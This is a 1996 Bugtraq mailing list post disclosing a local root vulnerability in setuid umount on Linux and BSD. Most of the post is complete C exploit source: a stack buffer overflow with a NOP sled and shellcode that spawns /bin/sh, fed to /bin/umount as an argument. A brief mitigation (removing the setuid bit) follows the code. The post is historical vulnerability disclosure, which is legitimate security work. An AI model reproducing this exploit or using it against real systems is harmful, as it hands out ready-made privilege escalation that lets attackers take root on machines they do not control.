Bugtraq mailing list archives
Linux & BSD's umount exploit
From: pjao () dux isec pt (Paulo Jorge Alves Oliveira)
Date: Tue, 29 Oct 1996 12:38:52 +0100
Hello, there is a bug in berkeley-derived umount, which allows attacker to get root access (see freebsd-security for details). Here is exploit for Linux (tested on 2.0.XX), for BSD (tested on FreeBSD 2.1) and a quick soluction. Best regards, Paulo -------------------------------------- linux_umount_exploit.c ---------- #include <stdio.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <sys/stat.h> #define PATH_MOUNT "/bin/umount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); execl(PATH_MOUNT, "umount", buff, NULL); } -------------------------------------------------------------------------- Here is a little solution -- chmod -s /bin/umount This way only root can run this command. With best regards, Paulo -- |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | JUST HAVE SOME FUN IN THIS | | CRAZY WORLD | |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | VIRTUAL PRAXIS -> CIUNIX.UC.PT 3333 | | IRC-PTnet -> IRC.ISEC.PT, CIUNIX.UC.PT, IRC.RCCN.NET, IRC.UALG.PT | | E-MAILs | | DO DOMINIO UC : | | pjao () ciunix uc pt | | pjao () gemini ci uc pt | | DO DOMINIO ISEC : | | pjao () dux isec pt | | ircadm () irc isec pt (Administrador do server de IRC do ISEC) | | WWW | | http://ciunix.uc.pt/~pjao | | http://dux.isec.pt/~pjao | ! TELEFONES | | ISEC : 039-7000200 Extensao 2718 ! | BIP : 0941-7-193144 ! |___________________________________________________________________________|
Current thread:
- Linux & BSD's umount exploit Paulo Jorge Alves Oliveira (Oct 29)
- Re: Linux & BSD's umount exploit David J. Meltzer (Oct 30)
- <Possible follow-ups>
- Re: Linux & BSD's umount exploit Mike Bremford (Oct 30)
- Re: Linux & BSD's umount exploit Alan Cox (Oct 30)